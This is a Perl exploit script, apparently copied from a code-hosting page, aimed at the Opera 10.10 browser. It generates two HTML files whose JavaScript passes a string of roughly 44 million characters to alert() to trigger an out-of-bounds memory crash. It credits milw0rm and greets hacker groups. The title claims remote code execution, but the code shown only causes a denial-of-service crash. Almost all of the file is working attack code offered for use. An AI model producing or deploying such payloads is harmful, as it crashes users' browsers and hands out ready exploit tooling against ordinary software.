53 lines
No EOL
1.8 KiB
Perl
Executable file
53 lines
No EOL
1.8 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
|
|
# Title : Opera 10.10 Remote Code Execution DoS Exploit
|
|
# Tested : Windows xp (sp2)
|
|
|
|
# Description : Opera Web Browser is vulnerable DoS within its javascript tags (alert)
|
|
# This issue can be exploited by using a large value in a alert tags to create an out-of-bounds memory access
|
|
# This have in advising at version 9.10 http://www.milw0rm.com/exploits/3871, and good news this issue still work on version 10.10
|
|
|
|
# Credits to Dj7xpl \ first exploiter
|
|
# Greetz : str0ke a great man :)
|
|
# muts and exploit-db
|
|
# opt!x hacker my best friend :d
|
|
# and all INDONESIAN hacker community
|
|
# cr4wl3r kiss your soul from Gorontalo - INDONESIA
|
|
|
|
# Sorry for my bad english :p~
|
|
|
|
print qq(
|
|
###################################################
|
|
## Opera 10.10 Remote Code Execution DoS Exploit ##
|
|
## Credits : Dj7xpl ##
|
|
## http://www.milw0rm.com/exploits/3871##
|
|
## Author : cr4wl3r <cr4wl3r[!]linuxmail.org> ##
|
|
## Greetz : str0ke, opt!x hacker, xoron ##
|
|
## all member at manadocoding.net ##
|
|
## all member at indonesianhacker.org ##
|
|
###################################################
|
|
);
|
|
|
|
my $header = "<html>\n<script>\n";
|
|
my $footer = "</script>\n</html>";
|
|
|
|
|
|
my $uhoh1 = "var buf = 'A';\n".
|
|
"while (buf.length <= 44444444) buf+=buf;\n".
|
|
"alert(buf)\n";
|
|
|
|
##################################################################
|
|
open(myfile,'>> uhoh1.html');
|
|
print myfile $header.$uhoh1.$footer;
|
|
##################################################################
|
|
|
|
|
|
my $uhoh2 = "alert(\'". "A" x 44444444 ."'\)"."\n";
|
|
|
|
##################################################################
|
|
open(myfile,'>> uhoh2.html');
|
|
print myfile $header.$uhoh2.$footer;
|
|
##################################################################
|
|
|
|
print "\nDone, successfully created!\n"; |